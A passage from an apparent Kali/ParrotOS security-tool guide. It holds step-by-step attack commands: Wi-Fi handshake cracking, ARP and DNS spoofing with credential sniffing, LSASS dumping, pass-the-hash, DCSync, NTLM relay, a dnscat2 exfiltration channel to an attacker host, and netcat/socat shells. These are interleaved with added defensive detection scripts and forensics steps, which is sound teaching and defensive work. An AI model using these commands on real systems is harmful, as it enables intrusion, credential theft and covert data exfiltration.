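10.0.0.7 - - [03/Mar/2026:10:31:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Mar/2026:10:31:05 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""

SSH_FAIL = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for .* from (\S+) port")
SSH_OK = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port")
HTTP_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "[^"]*" "([^"]*)"')

def _syslog_ts(stamp, year):
    # Syslog timestamps carry no year and pad the day with spaces; normalise both.
    return datetime.strptime("%d %s" % (year, " ".join(stamp.split())), "%Y %b %d %H:%M:%S")

def ssh_events(text, year=2026):
    """Yield (timestamp, source_ip, 'fail'|'ok', user_or_None) per sshd login line."""
    for line in text.splitlines():
        m = SSH_FAIL.match(line)
        if m:
            yield _syslog_ts(m.group(1), year), m.group(2), "fail", None
            continue
        m = SSH_OK.match(line)
        if m:
            yield _syslog_ts(m.group(1), year), m.group(3), "ok", m.group(2)

def http_events(text):
    """Yield (timestamp, source_ip, status, user_agent) per combined-format line."""
    for line in text.splitlines():
        m = HTTP_LINE.match(line)
        if m:
            ts = datetime.strptime(m.group(2).split()[0], "%d/%b/%Y:%H:%M:%S")
            yield ts, m.group(1), int(m.group(4)), m.group(5)

def bursts(events, is_hit, window_seconds, threshold):
    """Return {source: max_hits_in_window} for sources reaching the threshold.
    Sliding window over sorted timestamps; events are (timestamp, source, ...)."""
    by_src = defaultdict(list)
    for ev in events:
        if is_hit(ev):
            by_src[ev[1]].append(ev[0])
    flagged = {}
    for src, stamps in by_src.items():
        stamps.sort()
        start, best = 0, 0
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[src] = best
    return flagged

def detect_ssh_bruteforce(text, window_seconds=60, threshold=5):
    return bursts(ssh_events(text), lambda ev: ev[2] == "fail", window_seconds, threshold)

def detect_success_after_failures(text, window_seconds=300, threshold=5):
    """Sources that logged in successfully after a burst of failures: the case where
    the wordlist contained the password, so the account needs immediate action."""
    suspects = detect_ssh_bruteforce(text, window_seconds, threshold)
    return sorted({ev[1] for ev in ssh_events(text) if ev[2] == "ok" and ev[1] in suspects})

def detect_content_discovery(text, window_seconds=10, threshold=5):
    return bursts(http_events(text), lambda ev: ev[2] == 404, window_seconds, threshold)

if __name__ == "__main__":
    print("ssh brute force      :", detect_ssh_bruteforce(AUTH_LOG))
    print("success after failing:", detect_success_after_failures(AUTH_LOG))
    print("content discovery    :", detect_content_discovery(ACCESS_LOG))
```

A delay of 3 seconds between attempts (Hydra's -w 3) keeps each source under a 5-per-minute threshold, which is why the window should be sized from the lockout policy you actually enforce rather than from a round number; the same detector with a larger window and a higher threshold still catches the slow version.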
Wireless Attack Tools
Aircrack-ng Suite — Wi-Fi Security Auditing
The Aircrack-ng suite is a complete set of tools for 802.11 wireless network auditing. It includes: airmon-ng (enable monitor mode), airodump-ng (capture packets), aireplay-ng (inject packets and deauthenticate clients), and aircrack-ng (crack WEP/WPA-PSK keys from captured handshakes).
WPA2 4-Way Handshake Capture & Crack Procedure
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Identify Wireless Interface | iwconfig — OR — ip link show | Note your interface name (e.g., wlan0) |
| 2 | Kill Interfering Processes | sudo airmon-ng check kill | Stops NetworkManager and wpa_supplicant |
| 3 | Enable Monitor Mode | sudo airmon-ng start wlan0 | Creates monitor interface (wlan0mon) |
| 4 | Scan for Networks | sudo airodump-ng wlan0mon | Lists all visible APs with BSSID, channel, SSID |
| 5 | Target Specific AP | sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon | -c = channel; --bssid = AP MAC; -w = output file prefix |
| 6 | Deauthenticate Client | sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon | -0 5 = send 5 deauth frames; forces client to re-authenticate |
| 7 | Verify Handshake Captured | — Look for ‘WPA handshake’ message in airodump-ng output — | Handshake captured in capture-01.cap file |
| 8 | Crack with Aircrack-ng | aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap | -w = wordlist; -b = AP BSSID |
| 9 | Crack with Hashcat (GPU) | hcxpcapngtool capture-01.cap -o handshake.hc22000 && hashcat -m 22000 handshake.hc22000 rockyou.txt | Convert to hashcat format first for GPU acceleration |
| 10 | Restore Interface | sudo airmon-ng stop wlan0mon && sudo systemctl start NetworkManager | Returns interface to managed mode after testing |
Network Sniffing & MITM Tools
Wireshark — Packet Analyzer
Wireshark is the world’s foremost network protocol analyzer. It captures packets in real time from network interfaces and displays them with deep protocol dissection. Used for analyzing network traffic, detecting anomalies, capturing credentials on unencrypted protocols (FTP, Telnet, HTTP), and troubleshooting network issues.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch Wireshark | wireshark — OR (CLI) — tshark -i eth0 | GUI version; tshark is the CLI equivalent |
| 2 | Start Packet Capture | GUI: Double-click network interface (e.g., eth0) | Live packets begin streaming immediately |
| 3 | Capture to File | tshark -i eth0 -w capture.pcap | Saves packets to PCAP file for offline analysis |
| 4 | Filter by Protocol | Filter bar: http — OR — Filter bar: tcp.port == 443 | Display filter (not capture filter); applied post-capture |
| 5 | Follow TCP Stream | Right-click packet > ‘Follow’ > ‘TCP Stream’ | Reconstructs full TCP conversation in readable format |
| 6 | Filter HTTP Credentials | http.request.method == POST | Shows POST requests; inspect body for cleartext passwords |
| 7 | Extract Files from Capture | File > Export Objects > HTTP; select files to export | Reconstructs files (images, executables) from HTTP traffic |
| 8 | Capture Only Specific Host | tshark -i eth0 -f "host 192.168.1.100" -w target.pcap | -f = BPF capture filter (applied before capture) |
| 9 | Analyze with tshark | tshark -r capture.pcap -Y 'ftp contains password' -T fields -e ftp.request.arg | Extract FTP password field from saved capture |
Bettercap — Network MITM Framework
Bettercap is a powerful, extensible man-in-the-middle framework for network reconnaissance, ARP/DNS/HTTPS spoofing, credential sniffing, and BLE/Wi-Fi attacks. It replaces the older Ettercap tool with a modular, script-driven architecture and a built-in web UI.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Bettercap | sudo apt install bettercap -y && sudo bettercap -eval "caplets.update; ui.update; q" | Updates caplets and web UI on first run |
| 2 | Launch Bettercap | sudo bettercap -iface eth0 | Specify your active network interface |
| 3 | Discover Network Hosts | net.probe on; net.show | Probes network; net.show lists all discovered hosts |
| 4 | Enable ARP Spoofing | set arp.spoof.targets 192.168.1.50; arp.spoof on | Poisons ARP cache; victim’s traffic routes through attacker |
| 5 | Enable IP Forwarding | sudo sysctl -w net.ipv4.ip_forward=1 (from a separate shell on the attacker host) | Without IP forwarding, victim loses internet connectivity |
| 6 | Sniff Credentials | set net.sniff.verbose true; net.sniff on | Captures credentials from HTTP, FTP, Telnet, POP3, IMAP, etc. |
| 7 | DNS Spoofing | set dns.spoof.domains evil.com; set dns.spoof.address 192.168.1.10; dns.spoof on | Redirects DNS lookups for evil.com to attacker’s IP |
| 8 | HTTPS Downgrade (SSLstrip) | set https.proxy.sslstrip true; https.proxy on | Downgrades HTTPS to HTTP where HSTS is not enforced |
| 9 | Launch Web UI | sudo bettercap -caplet http-ui — Browser: http://127.0.0.1 — | Interactive web-based control panel for bettercap |
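ARP spoofing leaves two symptoms in every host's neighbour table on the segment: one MAC address suddenly answering for more than one IP, and a well-known address (the gateway) changing MAC between two observations. The script below is an added example (not bettercap code) that parses `ip neigh show` snapshots and raises an alert only when both symptoms coincide, since a router with secondary addresses legitimately owns several IPs. The two snapshots and their MACs are constructed; the "before" table is the normal state, the "after" table shows the host ending in :10 claiming the gateway's IP as well as its own.

```python
"""Detect ARP-cache poisoning from two `ip neigh show` snapshots. Added example;
the snapshot text and addresses are constructed sample data."""
import re

SNAPSHOT_BEFORE = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.10 dev eth0 lladdr aa:bb:cc:dd:ee:10 STALE
192.168.1.50 dev eth0 lladdr aa:bb:cc:dd:ee:50 REACHABLE
192.168.1.77 dev eth0 FAILED
"""
SNAPSHOT_AFTER = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:10 REACHABLE
192.168.1.10 dev eth0 lladdr aa:bb:cc:dd:ee:10 REACHABLE
192.168.1.50 dev eth0 lladdr aa:bb:cc:dd:ee:50 REACHABLE
192.168.1.77 dev eth0 FAILED
"""

# Entries without lladdr (FAILED/INCOMPLETE) carry no MAC and are skipped.
NEIGH = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17}) (\S+)$", re.I)

def parse_neigh(text):
    """Return {ip: mac} for every entry that has a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table

def duplicate_macs(table):
    """MACs that answer for more than one IP: {mac: sorted [ips]}.
    Weak signal on its own (multi-homed routers do this), strong when combined
    with a change of a watched address."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def changed_mappings(before, after, watch=None):
    """IPs whose MAC differs between snapshots: sorted [(ip, old_mac, new_mac)].
    watch: optional set of IPs to restrict to (gateway, DNS server, DHCP server)."""
    changes = []
    for ip, old in before.items():
        new = after.get(ip)
        if new and new != old and (watch is None or ip in watch):
            changes.append((ip, old, new))
    return sorted(changes)

def assess(before_text, after_text, gateway):
    """Combine both checks; an alert needs the gateway to have moved to a MAC that
    still owns another IP in the same table."""
    before, after = parse_neigh(before_text), parse_neigh(after_text)
    changes = changed_mappings(before, after, watch={gateway})
    dupes = duplicate_macs(after)
    alerts = ["gateway %s moved from %s to %s; %s also claims %s"
              % (ip, old, new, new, dupes[new])
              for ip, old, new in changes if new in dupes]
    return {"changes": changes, "duplicates": dupes, "alerts": alerts}

if __name__ == "__main__":
    # On a live host: capture `ip neigh show` periodically and feed consecutive snapshots.
    result = assess(SNAPSHOT_BEFORE, SNAPSHOT_AFTER, gateway="192.168.1.1")
    for line in result["alerts"]:
        print("ALERT:", line)
```

The same comparison works on a switch's MAC table or on DHCP lease data, and on the wire the equivalent signal is gratuitous ARP replies for the gateway IP arriving from a port that was never the gateway's.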
Post-Exploitation Tools
Mimikatz / Pypykatz — Credential Extraction
Mimikatz is a Windows-based post-exploitation tool that extracts plaintext passwords, NTLM hashes, Kerberos tickets, and other credentials from Windows memory (LSASS process). Pypykatz is a Python reimplementation that can be run directly from Kali/ParrotOS to parse LSASS dump files offline.
Step-by-Step Procedures — Pypykatz (from Kali/Parrot)
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Pypykatz | pip3 install pypykatz | Pure Python; no Windows required |
| 2 | Locate LSASS PID via Meterpreter | # In Meterpreter session: pgrep lsass.exe shell tasklist /FI "IMAGENAME eq lsass.exe" — Note the PID (e.g., 596) — | Must have SYSTEM-level privileges in Meterpreter session |
| 3 | Create LSASS Minidump | # In Meterpreter: procmem dump -p 596 -o lsass.dmp | Dumps LSASS process memory to file |
| 4 | Download Dump File | # In Meterpreter: download lsass.dmp /tmp/lsass.dmp | Transfers dump file to Kali/Parrot machine |
| 5 | Parse with Pypykatz | pypykatz lsa minidump /tmp/lsass.dmp | Extracts credentials from offline LSASS dump |
| 6 | Extract NTLM Hashes Only | pypykatz lsa minidump lsass.dmp -o output.json cat output.json | grep -A2 'NT:' | Filter for NT (NTLM) hashes for pass-the-hash attacks |
| 7 | Pass-the-Hash with CrackMapExec | crackmapexec smb 192.168.1.0/24 -u Administrator -H <NTLM_HASH> | Use extracted NTLM hash to authenticate without cracking |
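Steps 2 and 3 above open a handle to LSASS with memory-read rights, and that handle open is the most reliable detection point on the host. The following is an added example, not pypykatz or Mimikatz code and not part of the original page: it triages Sysmon Event ID 10 (ProcessAccess) records for processes reading LSASS memory. The field names are Sysmon's; the JSON log lines are constructed, and the allowlist of legitimate sources is an assumption to be tuned for a given host image.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for LSASS credential dumping.

Added example, not pypykatz/Mimikatz code. Field names follow Sysmon
(SourceImage, TargetImage, GrantedAccess, SourceProcessId); the sample
log below is constructed and the allowlist is an assumption.
"""
import json

PROCESS_VM_READ = 0x0010          # needed to read LSASS memory (minidump, Mimikatz)
PROCESS_QUERY_INFORMATION = 0x0400

# Processes that legitimately open LSASS with read access on a stock host
# (assumption: tune per estate, and prefer full-path matches as done here).
ALLOWLISTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def is_suspicious_lsass_access(event):
    """True when an unlisted process opened lsass.exe with memory-read rights."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    mask = int(event.get("GrantedAccess", "0x0"), 16)
    if not mask & PROCESS_VM_READ:
        return False          # query-only handles (e.g. 0x1400) cannot dump memory
    return event.get("SourceImage", "").lower() not in ALLOWLISTED_SOURCES


def triage(json_lines):
    """Parse JSON-per-line Sysmon events and return the suspicious ones in order."""
    hits = []
    for line in json_lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue          # skip a malformed line rather than abort the hunt
        if is_suspicious_lsass_access(event):
            hits.append({
                "time": event.get("UtcTime"),
                "source": event["SourceImage"],
                "pid": event.get("SourceProcessId"),
                "access": event["GrantedAccess"],
            })
    return hits


# Constructed sample telemetry (not real logs). Only the two unlisted
# sources with PROCESS_VM_READ in their mask should be flagged.
SAMPLE_LOG = r'''
{"EventID": 10, "UtcTime": "2025-01-10 09:00:01", "SourceImage": "C:\\Windows\\System32\\csrss.exe", "SourceProcessId": 612, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 10, "UtcTime": "2025-01-10 09:00:05", "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "SourceProcessId": 3120, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 1, "UtcTime": "2025-01-10 09:01:00", "Image": "C:\\Windows\\Temp\\update.exe", "ProcessId": 4488}
{"EventID": 10, "UtcTime": "2025-01-10 09:01:02", "SourceImage": "C:\\Windows\\Temp\\update.exe", "SourceProcessId": 4488, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "UtcTime": "2025-01-10 09:01:03", "SourceImage": "C:\\Windows\\System32\\taskmgr.exe", "SourceProcessId": 5012, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1400"}
{"EventID": 10, "UtcTime": "2025-01-10 09:02:10", "SourceImage": "C:\\Users\\bob\\AppData\\Local\\Temp\\procdump64.exe", "SourceProcessId": 5344, "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
'''


def run_demo():
    return triage(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for hit in run_demo():
        print(f"{hit['time']}  pid={hit['pid']:<6} access={hit['access']:<9} {hit['source']}")
```

The allowlist is keyed on full lowercase paths rather than file names on purpose: a copy of a trusted binary name dropped into a temp directory would otherwise be waved through. Enabling LSA protection (RunAsPPL) or Credential Guard is the mitigation that makes the flagged reads fail in the first place.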
Impacket — Windows Protocol Attack Suite
Impacket is a collection of Python classes and tools for working with Windows network protocols (SMB, MSRPC, NTLM, Kerberos, LDAP). It is essential for Active Directory penetration testing, providing tools for remote code execution, Kerberoasting, AS-REP roasting, and DCSync attacks.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Impacket | sudo apt install python3-impacket impacket-scripts -y | Installs all Impacket scripts to /usr/share/doc/python3-impacket/examples/ |
| 2 | Remote Code Execution (psexec) | impacket-psexec domain/Administrator:Password@192.168.1.100 | Spawns SYSTEM shell on Windows target via SMB |
| 3 | SMB Exec (Noisy Alternative) | impacket-smbexec domain/user:pass@192.168.1.100 | Similar to psexec but uses SMB share execution |
| 4 | WMI Execution | impacket-wmiexec domain/user:pass@192.168.1.100 'whoami' | Executes command via WMI; leaves fewer traces than psexec |
| 5 | Kerberoasting | impacket-GetUserSPNs domain.local/user:pass -dc-ip 192.168.1.10 -request | Requests service tickets for accounts with SPNs; crack offline with Hashcat |
| 6 | AS-REP Roasting | impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass | Requests AS-REP hashes for accounts without pre-auth required |
| 7 | DCSync Attack | impacket-secretsdump domain/DCAdmin:pass@DC_IP | Replicates DC hashes without running code on the DC; requires Domain Admin |
| 8 | NTLM Relay Attack | impacket-ntlmrelayx -tf targets.txt -smb2support | Relays NTLM authentication to other hosts; pair with Responder |
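Steps 5 and 6 leave a distinctive trail on the domain controller: a burst of RC4-encrypted service ticket requests (Event ID 4769, encryption type 0x17) from one client, and TGT requests served without pre-authentication (Event ID 4768, PreAuthType 0). The following is an added example, not Impacket code and not part of the original page: it applies those two checks to simplified event dicts. The events, client addresses and account names are constructed, and the thresholds are assumptions.

```python
"""Flag Kerberoasting and AS-REP roasting in domain controller security events.

Added example, not Impacket code. Works on simplified dicts carrying the
Event ID 4769/4768 fields; events, hosts and account names are constructed.
"""
from collections import defaultdict

RC4_HMAC = 0x17   # TicketEncryptionType requested by default in a Kerberoast


def _is_roastable_account(name):
    # Machine accounts (trailing $) and krbtgt are noise for these detections.
    return bool(name) and not name.endswith("$") and name.lower() != "krbtgt"


def detect_kerberoasting(events, min_services=3, window_s=60):
    """Return [(ip, [service accounts])] for clients that requested RC4 service
    tickets for at least min_services distinct accounts within window_s seconds."""
    per_ip = defaultdict(list)
    for e in events:
        if e.get("EventID") != 4769:
            continue
        if int(e.get("TicketEncryptionType", "0x0"), 16) != RC4_HMAC:
            continue
        if not _is_roastable_account(e.get("ServiceName", "")):
            continue
        per_ip[e["IpAddress"]].append((e["ts"], e["ServiceName"]))

    alerts = []
    for ip, reqs in per_ip.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):          # sliding window from each request
            services = {svc for t, svc in reqs[i:] if t - t0 <= window_s}
            if len(services) >= min_services:
                alerts.append((ip, sorted(services)))
                break
    return alerts


def detect_asrep_roasting(events):
    """Return [(ip, account)] for TGT requests granted without pre-authentication."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e.get("EventID") == 4768
            and str(e.get("PreAuthType")) == "0"
            and _is_roastable_account(e.get("TargetUserName", ""))]


# Constructed sample events (ts = seconds since the start of the log window).
SAMPLE_EVENTS = [
    {"EventID": 4769, "ts": 0, "IpAddress": "10.0.0.25", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "ts": 1, "IpAddress": "10.0.0.25", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "ts": 2, "IpAddress": "10.0.0.25", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "ts": 3, "IpAddress": "10.0.0.25", "ServiceName": "svc_files", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "ts": 10, "IpAddress": "10.0.0.40", "ServiceName": "svc_web", "TicketEncryptionType": "0x12"},  # AES: normal
    {"EventID": 4768, "ts": 20, "IpAddress": "10.0.0.40", "TargetUserName": "alice", "PreAuthType": "2"},
    {"EventID": 4768, "ts": 21, "IpAddress": "10.0.0.25", "TargetUserName": "svc_backup", "PreAuthType": "0"},
    {"EventID": 4769, "ts": 500, "IpAddress": "10.0.0.60", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "ts": 900, "IpAddress": "10.0.0.60", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},  # too slow
]


def run_demo():
    return detect_kerberoasting(SAMPLE_EVENTS), detect_asrep_roasting(SAMPLE_EVENTS)


if __name__ == "__main__":
    roasts, asreps = run_demo()
    print("kerberoast:", roasts)
    print("asrep-roast:", asreps)
```

Both checks follow from the mitigations: service accounts with AES-only `msDS-SupportedEncryptionTypes` and long random passwords (or gMSAs) make the RC4 requests disappear, and clearing "Do not require Kerberos preauthentication" removes the 4768/PreAuthType 0 events entirely, so anything that still matches is worth a look.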
11. ParrotOS-Exclusive & Anonymity Tools
While ParrotOS shares the majority of its security toolset with Kali Linux, it ships with several unique tools, particularly focused on anonymity, operational security (OPSEC), and privacy — critical considerations for covert engagements.
11.1 AnonSurf — System-Wide Traffic Anonymization
AnonSurf is a ParrotOS tool that routes all system network traffic through the Tor anonymization network, changes the system’s MAC address, and kills potentially identifying processes. It is not available in Kali Linux by default.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Start AnonSurf | sudo anonsurf start | Routes all traffic through Tor; changes MAC address |
| 2 | Check Current Status | sudo anonsurf status | Confirms Tor is running and traffic is anonymized |
| 3 | Check Current IP Address | curl https://api.ipify.org — Should return a Tor exit node IP — | Verify anonymization is working correctly |
| 4 | Change Tor Circuit | sudo anonsurf changeid | Requests a new Tor exit node (new apparent IP address) |
| 5 | Show Current Tor Exit IP | sudo anonsurf myip | Shows the public IP address of the current Tor exit node |
| 6 | Stop AnonSurf | sudo anonsurf stop | Restores normal network routing; real IP visible again |
11.2 Additional ParrotOS-Highlighted Tools
| Tool | Category | Purpose | Basic Command |
|---|---|---|---|
| EvilGinx2 | Phishing / MITM | Advanced phishing framework that proxies authentication pages to capture credentials and session cookies, bypassing 2FA. | evilginx2 |
| DNScat2 | C2 / Exfiltration | Command-and-control tool using DNS for covert communication and data exfiltration through firewalls. | dnscat2 --dns host=<attacker-IP> |
| Netcat (nc) | Network Utility | TCP/UDP networking Swiss Army knife: port scanning, bind/reverse shells, file transfer. | nc -lvnp 4444 (listener); nc 192.168.1.10 4444 (connect) |
| Socat | Network Relay | Advanced netcat alternative with SSL support, file transfers, and port forwarding. | socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash |
| Empire (PS-Empire) | Post-Exploitation C2 | PowerShell/Python C2 framework for managing post-exploitation agents with modules for lateral movement. | sudo powershell-empire |
| Fierce | DNS Recon | DNS reconnaissance tool for enumerating subdomains and adjacent IP space. | fierce --domain example.com |
| Masscan | Fast Port Scanner | Fastest Internet-scale port scanner (100M packets/sec). | sudo masscan 192.168.1.0/24 -p 22,80,443 --rate 1000 |
| Enum4linux-ng | SMB Enumeration | Enumerates Windows/Samba shares, users, password policies via SMB/RPC. | enum4linux-ng -A 192.168.1.100 |
Digital Forensics Tools
Both Kali Linux and ParrotOS include forensic investigation capabilities. ParrotOS’s ‘Forensics Edition’ specifically targets incident responders and digital forensic investigators.
Autopsy — Digital Forensics Platform
Autopsy is a digital forensics GUI built on top of The Sleuth Kit (TSK). It analyzes disk images and file systems for deleted files, browsing history, email artifacts, keyword searches, hash verification, and timeline analysis. Widely used in law enforcement and incident response.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Autopsy | sudo apt install autopsy -y | Web-based Autopsy 2.x comes with Kali; Autopsy 4.x must be downloaded separately |
| 2 | Acquire Disk Image | sudo dd if=/dev/sdb of=/evidence/disk.img bs=4M status=progress — OR — sudo dcfldd if=/dev/sdb of=/evidence/disk.img hash=md5 hashlog=hash.txt | Always verify hash integrity of acquired image |
| 3 | Start Autopsy | autopsy Browser: http://localhost:9999/autopsy | Opens Autopsy web interface in browser |
| 4 | Create New Case | New Case > Case Name: Incident_2025 Investigator: Your Name Time Zone: UTC | All evidence and notes stored per-case |
| 5 | Add Disk Image | Add Image > Disk Image > /evidence/disk.img Select file system type and mount point | Autopsy auto-detects partitions and file systems |
| 6 | Keyword Search | Keyword Search tab > Enter search terms (e.g., ‘password’, ‘confidential’, SSN patterns) | Searches allocated and unallocated space |
| 7 | File Analysis | File Analysis > Browse directory tree Right-click file > ‘Add to Image Details’ | Identify deleted files (shown in red in directory listing) |
| 8 | Timeline Analysis | Image Details > File Activity Timelines Set date range > Generate | Shows file access/modification/creation timeline |
| 9 | Generate Report | Generate Report > HTML Format > Generate | Exports full case report for evidentiary documentation |
Volatility — Memory Forensics Framework
Volatility is the leading open-source memory forensics framework. It analyzes raw memory dumps (RAM captures) from Windows, Linux, and macOS systems to extract running processes, network connections, injected code, encryption keys, user activity, and malware artifacts.
Step-by-Step Procedures
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Install Volatility 3 | git clone https://github.com/volatilityfoundation/volatility3.git cd volatility3 && pip3 install -r requirements.txt | Volatility 3 uses Python 3; no need to specify profiles |
| 2 | Identify OS Profile | python3 vol.py -f memory.dmp banners.Banners | Detects OS version and architecture from memory image |
| 3 | List Running Processes | python3 vol.py -f memory.dmp windows.pslist | Lists all active processes at time of capture |
| 4 | Detect Hidden Processes | python3 vol.py -f memory.dmp windows.psscan | Scans physical memory for EPROCESS structures; finds hidden/injected processes |
| 5 | List Network Connections | python3 vol.py -f memory.dmp windows.netstat | Shows TCP/UDP connections and listening ports |
| 6 | Dump Process Executable | python3 vol.py -f memory.dmp windows.dumpfiles --pid 1234 | Extracts PE from memory for malware analysis |
| 7 | Scan for Injected Code | python3 vol.py -f memory.dmp windows.malfind | Finds process memory regions with execute permissions and no backing file (classic injection indicator) |
| 8 | Extract Registry Hives | python3 vol.py -f memory.dmp windows.registry.hivelist | Lists all registry hives loaded in memory |
| 9 | Linux Memory Analysis | python3 vol.py -f linux_mem.dmp linux.pslist python3 vol.py -f linux_mem.dmp linux.bash | linux.bash recovers command history from memory |
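Step 7's note states the heuristic behind windows.malfind: executable memory that is private (no backing file) is where injected code lives, because legitimate code is mapped from an image on disk. The following is an added example, not Volatility code and not part of the original page: it applies that heuristic to constructed region records of the kind windows.vadinfo and windows.malfind report, and ranks hits by whether a PE header is present. It restricts itself to write+execute protections and skips zero-filled regions, two assumptions that trade some recall for fewer false positives; the tiny shellcode-prologue list is likewise an assumption.

```python
"""Malfind-style triage of process memory regions.

Added example, not Volatility code. Flags private (unbacked) memory that
is both writable and executable, ranks hits by content, and skips
zero-filled reservations. Region records below are constructed.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Region:
    pid: int
    process: str
    start: int
    size: int
    protection: str              # Windows page protection name
    mapped_file: Optional[str]   # None for private (VadS) memory
    head: bytes                  # first bytes of the region


EXEC_WRITE = {"PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}

# Assumption: a very small signature list for illustration only.
SHELLCODE_PROLOGUES = {b"\xfc\x48", b"\xfc\xe8"}


def classify(region):
    """Return (score, reason) for a suspicious region, or None if it looks benign."""
    if region.mapped_file is not None:
        return None   # file-backed: a loaded module, not injected code
    if region.protection not in EXEC_WRITE:
        return None   # heaps, stacks and data are not executable
    if not region.head.strip(b"\x00"):
        return None   # reserved-but-unused RWX space (assumption: skip)
    if region.head.startswith(b"MZ"):
        return (3, "PE image in private RWX memory (reflective/manual load)")
    if region.head[:2] in SHELLCODE_PROLOGUES:
        return (2, "known shellcode prologue in private RWX memory")
    return (1, "private RWX memory with content (JIT or injection; verify)")


def triage(regions):
    """Return hits as (score, pid, process, start_hex, reason), highest score first."""
    hits = []
    for r in regions:
        verdict = classify(r)
        if verdict:
            hits.append((verdict[0], r.pid, r.process, hex(r.start), verdict[1]))
    return sorted(hits, key=lambda h: (-h[0], h[1]))


# Constructed sample regions (not from a real memory image).
SAMPLE_REGIONS = [
    Region(1234, "notepad.exe", 0x1F0000, 0x10000, "PAGE_EXECUTE_READWRITE", None, b"MZ\x90\x00\x03\x00"),
    Region(1234, "notepad.exe", 0x7FF6A0000000, 0x40000, "PAGE_EXECUTE_WRITECOPY", r"\Windows\System32\notepad.exe", b"MZ\x90"),
    Region(2200, "svchost.exe", 0x2A0000, 0x1000, "PAGE_READWRITE", None, b"\x00\x00\x10\x00"),
    Region(3100, "powershell.exe", 0x1CB0000, 0x1000, "PAGE_EXECUTE_READWRITE", None, b"\xfc\x48\x83\xe4\xf0"),
    Region(4400, "w3wp.exe", 0x5C0000, 0x20000, "PAGE_EXECUTE_READWRITE", None, b"\x48\x8b\xc4\x48"),
    Region(4400, "w3wp.exe", 0x6D0000, 0x20000, "PAGE_EXECUTE_READWRITE", None, b"\x00" * 8),
]


def run_demo():
    return triage(SAMPLE_REGIONS)


if __name__ == "__main__":
    for score, pid, proc, start, reason in run_demo():
        print(f"[{score}] pid={pid:<6} {proc:16s} {start:16s} {reason}")
```

The score-1 bucket is where .NET and JavaScript JIT engines legitimately land, which is why a hit there is a prompt to dump the region (step 6) and inspect it, not a verdict on its own.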
Social Engineering Tools
Social-Engineer Toolkit (SET)
The Social-Engineer Toolkit (SET) is an open-source framework designed to simulate social engineering attacks. It automates phishing credential harvesting, website cloning, USB drop attacks, spear-phishing email campaigns, and more. SET is written in Python and is driven through an interactive menu system.
Step-by-Step Procedures — Credential Harvester
| # | Action | Command / Syntax | Notes |
|---|---|---|---|
| 1 | Launch SET | sudo setoolkit | Opens the SET interactive menu; requires root |
| 2 | Select Social-Engineering Attacks | Menu > 1) Social-Engineering Attacks | Main category for all phishing/SE attacks |
